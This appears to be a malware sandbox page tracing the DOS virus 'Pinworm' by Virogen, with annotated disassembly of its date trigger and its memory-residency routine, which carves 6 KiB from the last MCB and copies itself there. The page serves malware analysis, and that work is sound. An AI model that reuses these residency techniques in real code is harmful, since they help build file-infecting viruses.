Sample viewer

vx.netlux.org/Virus.DOS.Virogen.Pinworm.2167


Syscalls:

Time Syscall Op Syscall Name
; Trace rows read: <timestamp> <op> PC: <addr> | <name>. The op values line up
; with DOS INT 21h function numbers (AH) written in decimal: 42 = 2Ah Get date,
; 44 = 2Ch Get time. 250 = FAh is not a function the sandbox could name.
; NOTE(review): an unassigned function number is commonly a "resident copy
; present?" self-check in DOS file infectors - unconfirmed, the caller at
; 0x12bbd is not listed.
2018-12-17T22:29:11.342623486Z 250 PC: 12bbd | UNKNOWN!
; The listing after a row is a linear disassembly from that PC; it does not
; record which branch executed. The run record that follows this trace on the
; page sets Day to 1, so the day-19 comparison below would not match there.
2018-12-17T22:29:11.344743373Z 42 PC: 12bc5 | Get date 0x12bc5: cmp dl, 0x13 ; Get date returns the day of month in DL; 0x13 = 19
0x12bc8: jne 0x12bd1 ; any other day: skip the flag write
0x12bca: mov byte ptr cs:[bp + 0x69f], 1 ; date-trigger flag := 1 (its consumer is outside this excerpt)
0x12bd0: nop
; DS := ES - 1. Presumably ES still holds the PSP segment here (not shown);
; if so, DS addresses the program's Memory Control Block (MCB).
0x12bd1: mov ax, es
0x12bd3: dec ax
0x12bd4: mov ds, ax
0x12bd6: cmp byte ptr [0], 0x5a ; MCB type byte: 'Z' (0x5A) marks the last block in the chain
0x12bdb: jne 0x12c22 ; not the last block: skip the memory carve-out
0x12bdd: sub word ptr [3], 0x180 ; MCB size field (paragraphs) shrunk by 0x180 = 6144 bytes
0x12be3: sub word ptr [0x12], 0x180 ; MCB+0x12 = PSP+0x02, the top-of-memory segment, lowered to match
0x12be9: mov es, word ptr [0x12] ; ES := start of the area just removed from the block
0x12bed: push cs
0x12bee: pop ds ; DS := CS, source segment for the copy
0x12bef: mov si, bp ; source offset = BP (same base register as the flag write)
0x12bf1: mov cx, 0x438 ; element count for the copy
0x12bf4: xor di, di ; destination offset 0
; NOTE(review): this instruction is 2 bytes long (0x12bf6..0x12bf7). In 16-bit
; code that fits F3 A5 = rep movsw; a real movsd would need a 66 prefix and be
; 3 bytes. The copy is then 0x438 words = 2160 bytes, close to the 2167 in the
; sample name, not 4320. Check the raw bytes before trusting the mnemonic.
0x12bf6: rep movsd dword ptr es:[di], dword ptr [si]
; DS := 0, the segment that holds the real-mode interrupt vector table; the
; instructions that use it are not part of this listing.
; Visible effect for a defender: 0x180 paragraphs (6 KiB) leave the last memory
; block, so the memory total in the MCB chain ends up lower than installed RAM.
0x12bf8: xor ax, ax
0x12bfa: mov ds, ax
; Get time returns to 0x13003, which is a bare `ret`. Everything listed after
; it is a linear-sweep artifact: the encodings are printable ASCII, not code.
; Read as bytes, 0x13004..0x1302e spell
;   " _ PI_W_rM_v1.00 - Coded by _irogen in Apri"
; i.e. an embedded text banner, consistent with the family name in the page
; title. Bytes are reconstructed from the instruction encodings; confirm with
; a hex dump. Jump targets and memory operands printed below mean nothing.
2018-12-17T22:29:11.347883493Z 44 PC: 13003 | Get time 0x13003: ret ; first instruction after the call: return to caller
0x13004: and byte ptr [bx + 0x20], bl ; 20 5F 20 = " _ "
0x13007: push ax ; 50 = "P"
0x13008: dec cx ; 49 = "I"
0x13009: pop di ; 5F = "_"
0x1300a: push di ; 57 = "W"
0x1300b: pop di ; 5F = "_"
0x1300c: jb 0x1305b ; 72 4D = "rM"
0x1300e: pop di ; 5F = "_"
0x1300f: jbe 0x13042 ; 76 31 = "v1"
0x13011: xor byte ptr cs:[bx + si], dh ; 2E 30 30 = ".00"
0x13014: and byte ptr [di], ch ; 20 2D = " -"
0x13016: and byte ptr [bp + di + 0x6f], al ; 20 43 6F = " Co"
0x13019: and byte ptr fs:[bp + si + 0x79], ah ; 64 65 64 20 62 79 = "ded by" (first three bytes taken as prefixes)
0x1301f: and byte ptr [bx + 0x69], bl ; 20 5F 69 = " _i"
0x13022: jb 0x13093 ; 72 6F = "ro"
0x13024: outsb dx, byte ptr gs:[esi] ; 65 67 6E = "egn"
0x13027: and byte ptr [bx + di + 0x6e], ch ; 20 69 6E = " in"
0x1302a: and byte ptr [bx + di + 0x70], al ; 20 41 70 = " Ap"
0x1302d: jb 0x13098 ; 72 69 = "ri"; the text continues past the end of the listing

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5212,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Trace rows read: <timestamp> <op> PC: <addr> | <name>. Ops match DOS INT 21h
; function numbers (AH) in decimal: 42 = 2Ah Get date, 44 = 2Ch Get time;
; 250 = FAh is not a function the sandbox could name.
; NOTE(review): possibly a resident-copy self-check - unconfirmed, the caller
; at 0x12bbd is not listed.
2018-12-25T11:53:58.694681895Z 250 PC: 12bbd | UNKNOWN!
; The run record that follows this trace on the page sets Day to 19, the value
; tested below, so this run is the one that can reach the flag write. The
; listing is linear from the PC and does not itself show the path taken.
2018-12-25T11:53:58.696061349Z 42 PC: 12bc5 | Get date 0x12bc5: cmp dl, 0x13 ; DL = day of month from Get date; 0x13 = 19
0x12bc8: jne 0x12bd1 ; any other day: skip the flag write
0x12bca: mov byte ptr cs:[bp + 0x69f], 1 ; date-trigger flag := 1 (its consumer is outside this excerpt)
0x12bd0: nop
; DS := ES - 1; presumably ES is the PSP segment (not shown), which makes DS
; the program's Memory Control Block (MCB).
0x12bd1: mov ax, es
0x12bd3: dec ax
0x12bd4: mov ds, ax
0x12bd6: cmp byte ptr [0], 0x5a ; MCB type byte 'Z' = last block in the chain
0x12bdb: jne 0x12c22 ; not the last block: skip the memory carve-out
0x12bdd: sub word ptr [3], 0x180 ; MCB size (paragraphs) reduced by 0x180 = 6144 bytes
0x12be3: sub word ptr [0x12], 0x180 ; PSP+0x02 top-of-memory segment lowered by the same amount
0x12be9: mov es, word ptr [0x12] ; ES := segment of the carved-out area
0x12bed: push cs
0x12bee: pop ds ; DS := CS for the copy source
0x12bef: mov si, bp ; copy source offset = BP
0x12bf1: mov cx, 0x438 ; element count
0x12bf4: xor di, di ; destination offset 0
; NOTE(review): the instruction occupies 2 bytes, which in 16-bit code fits
; rep movsw (F3 A5) rather than a 66-prefixed movsd; the copy would then be
; 0x438 words = 2160 bytes. Verify against the raw bytes.
0x12bf6: rep movsd dword ptr es:[di], dword ptr [si]
; DS := 0 selects the segment of the real-mode interrupt vector table; what is
; done with it lies beyond this listing.
0x12bf8: xor ax, ax
0x12bfa: mov ds, ax
; Only the `ret` at 0x13003 is code. The bytes after it are printable ASCII
; that the disassembler swept through as if they were instructions; read as
; text, 0x13004..0x1302e give
;   " _ PI_W_rM_v1.00 - Coded by _irogen in Apri"
; (reconstructed from the encodings; confirm with a hex dump). Ignore the
; operands and branch targets shown for these lines.
2018-12-25T11:53:58.697813709Z 44 PC: 13003 | Get time 0x13003: ret ; return to caller right after Get time
0x13004: and byte ptr [bx + 0x20], bl ; 20 5F 20 = " _ "
0x13007: push ax ; 50 = "P"
0x13008: dec cx ; 49 = "I"
0x13009: pop di ; 5F = "_"
0x1300a: push di ; 57 = "W"
0x1300b: pop di ; 5F = "_"
0x1300c: jb 0x1305b ; 72 4D = "rM"
0x1300e: pop di ; 5F = "_"
0x1300f: jbe 0x13042 ; 76 31 = "v1"
0x13011: xor byte ptr cs:[bx + si], dh ; 2E 30 30 = ".00"
0x13014: and byte ptr [di], ch ; 20 2D = " -"
0x13016: and byte ptr [bp + di + 0x6f], al ; 20 43 6F = " Co"
0x13019: and byte ptr fs:[bp + si + 0x79], ah ; 64 65 64 20 62 79 = "ded by"
0x1301f: and byte ptr [bx + 0x69], bl ; 20 5F 69 = " _i"
0x13022: jb 0x13093 ; 72 6F = "ro"
0x13024: outsb dx, byte ptr gs:[esi] ; 65 67 6E = "egn"
0x13027: and byte ptr [bx + di + 0x6e], ch ; 20 69 6E = " in"
0x1302a: and byte ptr [bx + di + 0x70], al ; 20 41 70 = " Ap"
0x1302d: jb 0x13098 ; 72 69 = "ri"; text runs on past the listing

{"DateBased":true,"Day":19,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5212,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Trace rows read: <timestamp> <op> PC: <addr> | <name>. Ops match DOS INT 21h
; function numbers (AH) in decimal: 42 = 2Ah Get date, 44 = 2Ch Get time;
; 250 = FAh is not a function the sandbox could name.
; NOTE(review): possibly a resident-copy self-check - unconfirmed, the caller
; at 0x12bbd is not listed.
2018-12-25T11:53:58.814296154Z 250 PC: 12bbd | UNKNOWN!
; Linear disassembly from the PC after Get date: a day-of-month test followed
; by a memory carve-out at the top of the program's allocation. It does not
; show which branch ran.
2018-12-25T11:53:58.815563935Z 42 PC: 12bc5 | Get date 0x12bc5: cmp dl, 0x13 ; DL = day of month from Get date; 0x13 = 19
0x12bc8: jne 0x12bd1 ; any other day: skip the flag write
0x12bca: mov byte ptr cs:[bp + 0x69f], 1 ; date-trigger flag := 1 (its consumer is outside this excerpt)
0x12bd0: nop
; DS := ES - 1; presumably ES is the PSP segment (not shown), which makes DS
; the program's Memory Control Block (MCB).
0x12bd1: mov ax, es
0x12bd3: dec ax
0x12bd4: mov ds, ax
0x12bd6: cmp byte ptr [0], 0x5a ; MCB type byte 'Z' = last block in the chain
0x12bdb: jne 0x12c22 ; not the last block: skip the memory carve-out
0x12bdd: sub word ptr [3], 0x180 ; MCB size (paragraphs) reduced by 0x180 = 6144 bytes
0x12be3: sub word ptr [0x12], 0x180 ; PSP+0x02 top-of-memory segment lowered by the same amount
0x12be9: mov es, word ptr [0x12] ; ES := segment of the carved-out area
0x12bed: push cs
0x12bee: pop ds ; DS := CS for the copy source
0x12bef: mov si, bp ; copy source offset = BP
0x12bf1: mov cx, 0x438 ; element count
0x12bf4: xor di, di ; destination offset 0
; NOTE(review): 2-byte instruction; in 16-bit code that fits rep movsw (F3 A5),
; not a 66-prefixed movsd, so the copy is likely 0x438 words = 2160 bytes.
; Verify against the raw bytes.
0x12bf6: rep movsd dword ptr es:[di], dword ptr [si]
; DS := 0 selects the segment of the real-mode interrupt vector table; what is
; done with it lies beyond this listing.
0x12bf8: xor ax, ax
0x12bfa: mov ds, ax
; Only the `ret` at 0x13003 is code. What follows is ASCII data decoded as
; instructions by a linear sweep; as text, 0x13004..0x1302e read
;   " _ PI_W_rM_v1.00 - Coded by _irogen in Apri"
; (reconstructed from the encodings; confirm with a hex dump). The operands
; and branch targets on these lines carry no meaning.
2018-12-25T11:53:58.817988277Z 44 PC: 13003 | Get time 0x13003: ret ; return to caller right after Get time
0x13004: and byte ptr [bx + 0x20], bl ; 20 5F 20 = " _ "
0x13007: push ax ; 50 = "P"
0x13008: dec cx ; 49 = "I"
0x13009: pop di ; 5F = "_"
0x1300a: push di ; 57 = "W"
0x1300b: pop di ; 5F = "_"
0x1300c: jb 0x1305b ; 72 4D = "rM"
0x1300e: pop di ; 5F = "_"
0x1300f: jbe 0x13042 ; 76 31 = "v1"
0x13011: xor byte ptr cs:[bx + si], dh ; 2E 30 30 = ".00"
0x13014: and byte ptr [di], ch ; 20 2D = " -"
0x13016: and byte ptr [bp + di + 0x6f], al ; 20 43 6F = " Co"
0x13019: and byte ptr fs:[bp + si + 0x79], ah ; 64 65 64 20 62 79 = "ded by"
0x1301f: and byte ptr [bx + 0x69], bl ; 20 5F 69 = " _i"
0x13022: jb 0x13093 ; 72 6F = "ro"
0x13024: outsb dx, byte ptr gs:[esi] ; 65 67 6E = "egn"
0x13027: and byte ptr [bx + di + 0x6e], ch ; 20 69 6E = " in"
0x1302a: and byte ptr [bx + di + 0x70], al ; 20 41 70 = " Ap"
0x1302d: jb 0x13098 ; 72 69 = "ri"; text runs on past the listing